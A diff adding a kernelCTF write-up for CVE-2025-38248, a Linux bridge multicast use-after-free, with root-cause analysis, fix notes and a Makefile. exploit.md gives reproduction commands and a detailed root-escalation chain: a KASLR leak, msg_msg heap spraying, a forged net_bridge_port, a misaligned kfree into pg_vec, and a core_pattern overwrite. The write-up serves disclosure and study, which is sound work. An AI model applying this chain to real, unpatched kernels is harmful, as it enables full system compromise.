127 changes: 127 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38248_cos/docs/exploit.md
@@ -0,0 +1,127 @@
# CVE-2025-38248

## Exploit Primitives

- **Vulnerable object**: `net_bridge_port` (`kmalloc-1k`)
- **Primitive chain**: UAF → controlled `hlist` write → `msg_msg->security` corruption → misaligned `kfree` → USMA privilege escalation

## Vulnerability Overview

The root cause is that `br_multicast_port_ctx_deinit()` ([br_multicast.c:2014](../linux/net/bridge/br_multicast.c)) only cancels multicast router timers but does not remove the port from the global multicast router port lists (`ip4_mc_router_list` / `ip6_mc_router_list`):

```c
void br_multicast_port_ctx_deinit(struct net_bridge_mcast_port *pmctx)
{
#if IS_ENABLED(CONFIG_IPV6)
	del_timer_sync(&pmctx->ip6_mc_router_timer);
#endif
	del_timer_sync(&pmctx->ip4_mc_router_timer);
	// Missing: br_ip4_multicast_rport_del(pmctx)
	// Missing: br_ip6_multicast_rport_del(pmctx)
}
```

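This function is called during port deletion by `br_multicast_del_port()` ([br_multicast.c:2043](../linux/net/bridge/br_multicast.c)). Once per-VLAN multicast snooping is enabled, disabling a port no longer touches its per-port multicast context, so this deinit is the only cleanup that context receives. Since it only cancels timers without removing the `hlist` entries, deleting a port that was (re-)added to the list in permanent multicast router state (`mcast_router=2`) leaves a dangling pointer in the global router list.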

Trigger sequence (corresponding to [exploit.c:829-849](../exploit/cos-121-18867.294.25/exploit.c)):

```bash
# 1. Create a bridge with VLAN filtering and multicast snooping
ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1
# 2. Add a port
ip link add name dummy1 up master br1 type dummy
# 3. Set as permanent multicast router → ip4_rlist / ip6_rlist added to global router list
ip link set dev dummy1 type bridge_slave mcast_router 2
# 4. Enable per-VLAN multicast snooping → disables base port context, ip4_rlist / ip6_rlist removed from list
ip link set dev br1 type bridge mcast_vlan_snooping 1
# 5. Reset then re-set mcast_router
# Note: setting directly to 2 would be skipped due to the (pmctx->multicast_router == val)
# check in br_multicast_set_port_router(), so we must first set to 0 to change the value,
# then set to 2 to trigger re-addition
ip link set dev dummy1 type bridge_slave mcast_router 0
ip link set dev dummy1 type bridge_slave mcast_router 2
# 6. Delete port → br_multicast_port_ctx_deinit() only cancels timers, doesn't clean up list → UAF
ip link del dev dummy1
```
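To make the list bookkeeping in the trigger sequence concrete, here is a minimal userspace model of it. The `toy_*` names are hypothetical, only the IPv4 router list is modelled, and the kernel paths are reduced to the list operations described above (disabling the base context unlinks the node, writing the current `mcast_router` value is a no-op, and deinit only cancels timers). Treat it as an illustration under those assumptions, not a faithful copy of `br_multicast.c`.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Minimal, non-RCU stand-in for the kernel's hlist. */
struct hlist_node { struct hlist_node *next, **pprev; };
struct hlist_head { struct hlist_node *first; };

static bool hlist_unhashed(const struct hlist_node *n) { return n->pprev == NULL; }

static void hlist_add_head(struct hlist_node *n, struct hlist_head *h)
{
	n->next = h->first;
	if (h->first)
		h->first->pprev = &n->next;
	h->first = n;
	n->pprev = &h->first;
}

static void hlist_del_init(struct hlist_node *n)
{
	if (hlist_unhashed(n))
		return;
	*n->pprev = n->next;
	if (n->next)
		n->next->pprev = n->pprev;
	n->next = NULL;
	n->pprev = NULL;
}

/* Hypothetical toy types: one port's base multicast context and the bridge. */
struct toy_port {
	struct hlist_node ip4_rlist;
	int mcast_router;               /* 0 = disabled, 2 = permanent */
};

struct toy_bridge {
	struct hlist_head ip4_mc_router_list;
	bool vlan_snooping;
};

/* Steps 3 and 5: writing the current value again is ignored. */
static void toy_set_port_router(struct toy_bridge *br, struct toy_port *p, int val)
{
	if (p->mcast_router == val)
		return;
	p->mcast_router = val;
	if (val == 0)
		hlist_del_init(&p->ip4_rlist);
	else if (val == 2 && hlist_unhashed(&p->ip4_rlist))
		hlist_add_head(&p->ip4_rlist, &br->ip4_mc_router_list);
}

/* Step 4: the base context is disabled and unlinked, but mcast_router stays 2. */
static void toy_enable_vlan_snooping(struct toy_bridge *br, struct toy_port *p)
{
	br->vlan_snooping = true;
	hlist_del_init(&p->ip4_rlist);
}

/* Step 6: with per-VLAN snooping on, port disablement skips the base context
 * and deinit only cancels timers, so the node stays linked. */
static void toy_del_port(struct toy_bridge *br, struct toy_port *p)
{
	if (!br->vlan_snooping)
		hlist_del_init(&p->ip4_rlist);
}
```

Running steps 3 through 6 against this model leaves `ip4_mc_router_list.first` pointing at the deleted port's node, which is the stale entry used in the exploitation steps.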

## Exploitation

### 1. Leak and Heap Layout

Bypass KASLR using the [Entrybleed](https://www.willsroot.io/2022/12/entrybleed.html) prefetch side-channel ([exploit.c:299-455](../exploit/cos-121-18867.294.25/exploit.c)) to leak the kernel base (`leak_kernel_base`) and the direct mapping base (`leak_kheap_base`).

Then spray `msg_msg` objects (`kmalloc-cg-4k`) across 12 child processes (each with its own IPC namespace), totaling ~1.37 GB. Using the leaked heap base plus an empirical offset `0xa000000`, compute a target address `GUESSED_MSG_ADDR` that is highly likely to contain a `msg_msg` object. The subsequent write target is the `msg_msg->security` field (offset 40) at this address.
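The target-address arithmetic can be sketched as follows. It assumes the x86-64 layout of `struct msg_msg` (mirrored by the hypothetical `msg_msg_mirror`, no struct layout randomization) and that message data starts immediately after the 48-byte header, as `load_msg()` copies it to `msg + 1`. The heap base in the usage test is a hypothetical value (the non-randomized direct-map base), not a real leak.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userspace mirror of struct msg_msg on x86-64, used only for offsets. */
struct list_head_mirror { uint64_t next, prev; };
struct msg_msg_mirror {
	struct list_head_mirror m_list; /* 0  */
	int64_t  m_type;                /* 16 */
	uint64_t m_ts;                  /* 24 */
	uint64_t next;                  /* 32: struct msg_msgseg * */
	uint64_t security;              /* 40 */
	/* message data (mtext) follows the 48-byte header */
};

_Static_assert(offsetof(struct msg_msg_mirror, security) == 40, "security offset");
_Static_assert(sizeof(struct msg_msg_mirror) == 48, "header size");

#define GUESS_OFFSET  0xa000000ULL  /* empirical offset from the write-up */
#define MARKER_OFFSET 0x100ULL      /* offset inside the user-visible mtext */

static uint64_t guessed_msg_addr(uint64_t kheap_base)
{
	return kheap_base + GUESS_OFFSET;
}

/* target_1: &msg->security */
static uint64_t target_security(uint64_t msg)
{
	return msg + offsetof(struct msg_msg_mirror, security);
}

/* target_2: &msg->mtext[MARKER_OFFSET], with mtext right after the header */
static uint64_t target_marker(uint64_t msg)
{
	return msg + sizeof(struct msg_msg_mirror) + MARKER_OFFSET;
}
```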

### 2. Trigger UAF and Reclaim

The bridge maintains a global multicast router port list (`ip4_mc_router_list`) to ensure multicast packets are forwarded to ports behind multicast routers. Each port is linked into this list via `net_bridge_mcast_port.ip4_rlist` (an `hlist_node`).

After deleting `dummy1`, its `net_bridge_port` (`kmalloc-1k`) is freed, but the global router list still references its `multicast_ctx.ip4_rlist` and `multicast_ctx.ip6_rlist`.

Reclaim the freed memory by spraying `sk_buff` data, sent over netlink (`NETLINK_USERSOCK`), that contains a crafted `net_bridge_port` object ([exploit.c:852-856](../exploit/cos-121-18867.294.25/exploit.c)):

```c
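void craft_fake_net_bridge_port(void *fake, void *target_1, void *target_2)
{
	struct net_bridge_port *p = (struct net_bridge_port *)fake;

	/* hlist_node.pprev sits 8 bytes after .next, so pointing .next at
	 * (target - 8) makes hlist_add_behind_rcu() write to target itself */
	p->multicast_ctx.ip4_rlist.next = (struct hlist_node *)((char *)target_1 - 8); // write target 1
	p->multicast_ctx.ip6_rlist.next = (struct hlist_node *)((char *)target_2 - 8); // write target 2 (marker)
	p->multicast_ctx.port = (struct net_bridge_port *)0xffffffffffffffffUL;        // pass null checks
}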
```

The two write targets are:
- `target_1` = `&GUESSED_MSG_ADDR->security` (to overwrite `msg_msg->security`)
- `target_2` = `&GUESSED_MSG_ADDR->mtext[MARKER_OFFSET]` (to write a marker in the message data for victim identification)

### 3. Controlled Write

Create `dummy2` and set `mcast_router=2` ([exploit.c:858-864](../exploit/cos-121-18867.294.25/exploit.c)), triggering `br_multicast_add_router()` ([br_multicast.c:3339](../linux/net/bridge/br_multicast.c)) to traverse the router list. When it encounters the dangling node (now occupied by our crafted data), the kernel calls `hlist_add_behind_rcu()` to insert `dummy2`'s node after it:

```c
// include/linux/rculist.h:678
static inline void hlist_add_behind_rcu(struct hlist_node *n,
					struct hlist_node *prev)
{
	n->next = prev->next;                           // [1]
	WRITE_ONCE(n->pprev, &prev->next);
	rcu_assign_pointer(hlist_next_rcu(prev), n);
	if (n->next)
		WRITE_ONCE(n->next->pprev, &n->next);   // [2]
}
```

Here `prev` is the crafted node (occupying `dummy1`'s freed `ip4_rlist`), and `n` is `dummy2`'s `ip4_rlist`:

- `[1]`: We set `prev->next` to `&msg_msg->security - 8`, so `n->next = &msg_msg->security - 8`
- `[2]`: The address of `n->next->pprev` is `(&msg_msg->security - 8) + offsetof(hlist_node, pprev)` = `&msg_msg->security - 8 + 8` = `&msg_msg->security`. Thus `msg_msg->security` is overwritten with `&n->next`.

**Result**: `msg_msg->security = &dummy2->multicast_ctx.ip4_rlist.next`, i.e., `dummy2_base + 408`.

Similarly, the `ip6_rlist` write uses the same mechanism to write a non-zero value at `msg_msg->mtext[MARKER_OFFSET]`, serving as a marker to identify the victim.
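Steps [1] and [2] can be reproduced in userspace to check the offset reasoning. In this sketch, `simulate_write` is a hypothetical helper, the fake `msg_msg` is a zeroed 48-byte region viewed as three `hlist_node`s (so byte offset 40 is exactly `fake_msg[2].pprev` with 8-byte pointers), and RCU annotations are dropped since only the pointer stores matter.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct hlist_node { struct hlist_node *next, **pprev; };

/* Same stores as hlist_add_behind_rcu(), without RCU annotations. */
static void hlist_add_behind(struct hlist_node *n, struct hlist_node *prev)
{
	n->next = prev->next;                 /* [1] value planted in the fake node */
	n->pprev = &prev->next;
	prev->next = n;
	if (n->next)
		n->next->pprev = &n->next;    /* [2] stores &n->next at n->next + 8 */
}

/*
 * fake_msg: stands in for a msg_msg header; fake_msg[2].pprev is byte 40,
 *           i.e. msg_msg->security on x86-64.
 * dangling: the reclaimed ip4_rlist of the freed port (attacker-controlled).
 * n:        the new port's ip4_rlist being inserted.
 */
static void simulate_write(struct hlist_node fake_msg[3],
			   struct hlist_node *dangling, struct hlist_node *n)
{
	struct hlist_node ***target = &fake_msg[2].pprev;   /* "&msg->security" */

	/* prev->next = target - offsetof(struct hlist_node, pprev), i.e. target - 8 */
	dangling->next = (struct hlist_node *)((char *)target -
					       offsetof(struct hlist_node, pprev));
	hlist_add_behind(n, dangling);
}
```

After the call, the slot at byte 40 holds `&n->next`, mirroring `msg_msg->security = dummy2_base + 408`; the marker write works the same way with `target_2`.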

### 4. Locate Victim msg_msg

Child processes use the `MSG_COPY` flag to non-destructively read all messages, checking whether offset `MARKER_OFFSET` (0x100) contains a non-zero value ([exploit.c:543-559](../exploit/cos-121-18867.294.25/exploit.c)). The marker written by the `ip6_rlist` write pinpoints exactly which `msg_msg` was hit:

```c
uint64_t *marker = (uint64_t *)&msgbuf.mtext[MARKER_OFFSET];
if (*marker) {
	shared->victim_msg_idx = msg_idx;
	shared->victim_process = process_idx;
}
```
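The same check can be factored into a small helper over already-copied message bodies. `find_victim` is a hypothetical name; it assumes each buffer was obtained beforehand (for example with `msgrcv()` and `MSG_COPY`, which must be combined with `IPC_NOWAIT` and needs `CONFIG_CHECKPOINT_RESTORE`) and is at least `MARKER_OFFSET + 8` bytes long. Reading through `memcpy` sidesteps the alignment and aliasing questions raised by casting a `char` pointer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MARKER_OFFSET 0x100  /* value from the write-up */

/* Returns the index of the first message whose 8 bytes at MARKER_OFFSET
 * are non-zero, or -1 if no message was hit. */
static long find_victim(const unsigned char *const *msgs, size_t count)
{
	for (size_t i = 0; i < count; i++) {
		uint64_t marker;

		memcpy(&marker, msgs[i] + MARKER_OFFSET, sizeof(marker));
		if (marker)
			return (long)i;
	}
	return -1;
}
```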

### 5. Misaligned kfree and USMA Privilege Escalation

After deleting `dummy2`, reclaim its freed memory with `pg_vec` (`AF_PACKET` socket RX ring page pointer arrays, `kmalloc-1k`) ([exploit.c:872-877](../exploit/cos-121-18867.294.25/exploit.c)).

Then call `msgrcv` to receive the victim message. The kernel calls `kfree(msg->security)` when freeing the `msg_msg`:

- `msg->security` has been overwritten to `dummy2_base + 408` — this is not an object-aligned address, but a pointer at offset 408 within a `kmalloc-1k` object
- `kfree` does not validate whether the pointer is aligned to an object start; it places `dummy2_base + 408` directly onto the `kmalloc-1k` freelist
- Meanwhile, the `pg_vec` at `dummy2_base` is still actively referenced by a `packet_socket`

This is the core of the **misaligned kfree** technique: the next `kmalloc-1k` allocation returns `dummy2_base + 408`, so the newly allocated buffer starts in the middle of the live `pg_vec`. Spraying 616 bytes (= 1024 - 408, exactly the remainder of the object) of `core_pattern` page addresses via `sk_buff` overwrites the `pg_vec` entries from index 51 (= 408 / 8) onward.
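The overlap arithmetic can be checked with a few lines of C. The helper names are hypothetical; the sketch assumes 8-byte `pg_vec` entries (`struct pgv` holds a single `char *buffer` on x86-64) and, for the entry count, a `pg_vec` that fills the whole 1 KiB object (128 entries).

```c
#include <assert.h>
#include <stddef.h>

#define SLOT_SIZE 1024   /* kmalloc-1k object size */
#define PGV_ENTRY 8      /* one char * per pg_vec entry on x86-64 */

/* First pg_vec index overlapped by an allocation starting `skew` bytes
 * into the live pg_vec object. */
static size_t first_overlapped_entry(size_t skew) { return skew / PGV_ENTRY; }

/* Bytes from `skew` to the end of the original object. */
static size_t remaining_bytes(size_t skew) { return SLOT_SIZE - skew; }

/* Whole pg_vec entries covered by a spray of remaining_bytes(skew). */
static size_t overwritten_entries(size_t skew) { return remaining_bytes(skew) / PGV_ENTRY; }
```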

Finally, iterate over all `packet_socket`s and `mmap` their ring buffers ([exploit.c:646-667](../exploit/cos-121-18867.294.25/exploit.c)). The corrupted `pg_vec` entries cause the corresponding pages in the `mmap` region to map to the kernel page containing `core_pattern`. Overwrite `core_pattern` with `|/proc/%P/fd/666 %P`. A previously forked child process ([exploit.c:778-783](../exploit/cos-121-18867.294.25/exploit.c)) detects the overwrite and triggers a crash, causing the kernel to execute the exploit binary itself with root privileges to read the flag.
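Locating `core_pattern` inside a ring mapping is simple offset arithmetic. This sketch assumes an RX-only ring whose `tp_block_size` equals the 4 KiB page size, so `pg_vec` entry `i` backs bytes `[i * 4096, (i + 1) * 4096)` of the mapping; `core_pattern_map_offset` is a hypothetical helper, and the symbol address in the usage test is made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE_4K 4096ULL

/* Offset inside the mmap'd ring at which core_pattern appears, given the
 * index of a pg_vec entry that was redirected to core_pattern's page. */
static uint64_t core_pattern_map_offset(uint64_t idx, uint64_t core_pattern_addr)
{
	return idx * PAGE_SIZE_4K + (core_pattern_addr & (PAGE_SIZE_4K - 1));
}
```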

124 changes: 124 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38248_cos/docs/vulnerability.md
@@ -0,0 +1,124 @@
# Vulnerability Details

- **Requirements**:
  - **Capabilities**: `CAP_NET_ADMIN`
  - **Kernel configuration**: `CONFIG_BRIDGE_IGMP_SNOOPING`
  - **User namespaces required**: Yes
- **Introduced by**:
  - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4b30ae9adb04 ("net: bridge: mcast: re-implement br_multicast_{enable, disable}_port functions")
  - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2796d846d74a ("net: bridge: vlan: convert mcast router global option to per-vlan entry")
- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f05a4f9e959e0fc098046044c650acf897ea52d2
- **Affected Versions**: `5.15 - 6.15.5`
- **Affected Component**: `net/bridge` (multicast snooping)
- **Cause**: Use-after-free
- **Description**: When per-VLAN multicast snooping is toggled, `br_multicast_port_ctx_deinit()` only cancels multicast router timers but does not remove the port from the global (or per-VLAN) multicast router port lists. A port in permanent multicast router state (`mcast_router=2`) can be re-added to the router list after snooping mode changes, and when the port is subsequently deleted, a dangling pointer remains in the list. Traversing the list (e.g., when adding a new port) triggers a use-after-free on the freed `net_bridge_port` object.

# Vulnerability Analysis

The bridge maintains a global list of ports behind which a multicast
router resides. The list is consulted during forwarding to ensure
multicast packets are forwarded to these ports even if the ports are not
members of the matching MDB entry.

When per-VLAN multicast snooping is enabled, the per-port multicast
context is disabled on each port and the port is removed from the global
router port list:

```bash
# ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1
# ip link add name dummy1 up master br1 type dummy
# ip link set dev dummy1 type bridge_slave mcast_router 2
$ bridge -d mdb show | grep router
router ports on br1: dummy1
# ip link set dev br1 type bridge mcast_vlan_snooping 1
$ bridge -d mdb show | grep router
```

However, the port can be re-added to the global list even when per-VLAN
multicast snooping is enabled:

```bash
# ip link set dev dummy1 type bridge_slave mcast_router 0
# ip link set dev dummy1 type bridge_slave mcast_router 2
$ bridge -d mdb show | grep router
router ports on br1: dummy1
```

Since commit 4b30ae9adb04 ("net: bridge: mcast: re-implement
br_multicast_{enable, disable}_port functions"), when per-VLAN multicast
snooping is enabled, multicast disablement on a port will disable the
per-{port, VLAN} multicast contexts and not the per-port one. As a
result, a port will remain in the global router port list even after it
is deleted. This will lead to a use-after-free [1] when the list is
traversed (when adding a new port to the list, for example):

```bash
# ip link del dev dummy1
# ip link add name dummy2 up master br1 type dummy
# ip link set dev dummy2 type bridge_slave mcast_router 2
```

Similarly, stale entries can also be found in the per-VLAN router port
list. When per-VLAN multicast snooping is disabled, the per-{port, VLAN}
contexts are disabled on each port and the port is removed from the
per-VLAN router port list:

```bash
# ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1 mcast_vlan_snooping 1
# ip link add name dummy1 up master br1 type dummy
# bridge vlan add vid 2 dev dummy1
# bridge vlan global set vid 2 dev br1 mcast_snooping 1
# bridge vlan set vid 2 dev dummy1 mcast_router 2
$ bridge vlan global show dev br1 vid 2 | grep router
router ports: dummy1
# ip link set dev br1 type bridge mcast_vlan_snooping 0
$ bridge vlan global show dev br1 vid 2 | grep router
```

However, the port can be re-added to the per-VLAN list even when
per-VLAN multicast snooping is disabled:

```bash
# bridge vlan set vid 2 dev dummy1 mcast_router 0
# bridge vlan set vid 2 dev dummy1 mcast_router 2
$ bridge vlan global show dev br1 vid 2 | grep router
router ports: dummy1
```

When the VLAN is deleted from the port, the per-{port, VLAN} multicast
context will not be disabled since multicast snooping is not enabled
on the VLAN. As a result, the port will remain in the per-VLAN router
port list even after it is no longer a member of the VLAN. This will lead
to a use-after-free [2] when the list is traversed (when adding a new
port to the list, for example):

```bash
# ip link add name dummy2 up master br1 type dummy
# bridge vlan add vid 2 dev dummy2
# bridge vlan del vid 2 dev dummy1
# bridge vlan set vid 2 dev dummy2 mcast_router 2
```

The root cause is that `br_multicast_port_ctx_deinit()` only cancels
multicast router timers but does not remove the port from the router
port lists:

```c
void br_multicast_port_ctx_deinit(struct net_bridge_mcast_port *pmctx)
{
#if IS_ENABLED(CONFIG_IPV6)
	del_timer_sync(&pmctx->ip6_mc_router_timer);
#endif
	del_timer_sync(&pmctx->ip4_mc_router_timer);
	// Missing: br_ip4_multicast_rport_del(pmctx)
	// Missing: br_ip6_multicast_rport_del(pmctx)
}
```

The fix adds the missing list removal calls so that ports are properly
unlinked from the router port lists during port/VLAN deletion.

Note that deleting the multicast router timer is not enough as it only
takes care of the temporary multicast router states (1 or 3) and not the
permanent one (2).
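The effect of adding the list removal can be illustrated with a toy model. `toy_pmctx` and the `toy_ctx_deinit_*` helpers are hypothetical, timers are reduced to booleans, and locking and netlink notification are omitted; this is a simplified sketch of the idea, not the upstream patch.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct hlist_node { struct hlist_node *next, **pprev; };
struct hlist_head { struct hlist_node *first; };

static void hlist_add_head(struct hlist_node *n, struct hlist_head *h)
{
	n->next = h->first;
	if (h->first)
		h->first->pprev = &n->next;
	h->first = n;
	n->pprev = &h->first;
}

/* Unlinks n if it is on a list and reports whether anything was removed. */
static bool hlist_del_init_ret(struct hlist_node *n)
{
	if (!n->pprev)
		return false;
	*n->pprev = n->next;
	if (n->next)
		n->next->pprev = n->pprev;
	n->next = NULL;
	n->pprev = NULL;
	return true;
}

struct toy_pmctx {
	struct hlist_node ip4_rlist, ip6_rlist;
	bool ip4_timer_armed, ip6_timer_armed;
};

/* Before the fix: timers are cancelled, list membership is untouched. */
static void toy_ctx_deinit_buggy(struct toy_pmctx *c)
{
	c->ip6_timer_armed = false;
	c->ip4_timer_armed = false;
}

/* After the fix (sketch): additionally unlink from both router port lists. */
static bool toy_ctx_deinit_fixed(struct toy_pmctx *c)
{
	bool del = false;

	toy_ctx_deinit_buggy(c);
	del |= hlist_del_init_ret(&c->ip6_rlist);
	del |= hlist_del_init_ret(&c->ip4_rlist);
	return del;
}
```

With the buggy variant the list heads keep pointing at the deinitialized context; with the fixed variant the context is unlinked regardless of whether the router state was temporary or permanent.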

@@ -0,0 +1,20 @@
KERNELXDK_INCLUDE_DIR ?= /usr/local/include
KERNELXDK_LIB_DIR ?= /usr/lib

CXX = g++
CXXFLAGS = -I. -I$(KERNELXDK_INCLUDE_DIR) -static -pthread -s
LDFLAGS = -L$(KERNELXDK_LIB_DIR) -lkernelXDK -lkeyutils

exploit: exploit.cpp target_db.kxdb
	$(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS)

exploit_debug: exploit.cpp target_db.kxdb
	$(CXX) $(filter-out -s,$(CXXFLAGS)) -g -o $@ $< $(LDFLAGS)

target_db.kxdb:
	wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb

clean:
	rm -f exploit exploit_debug target_db.kxdb

.PHONY: clean
Binary file not shown.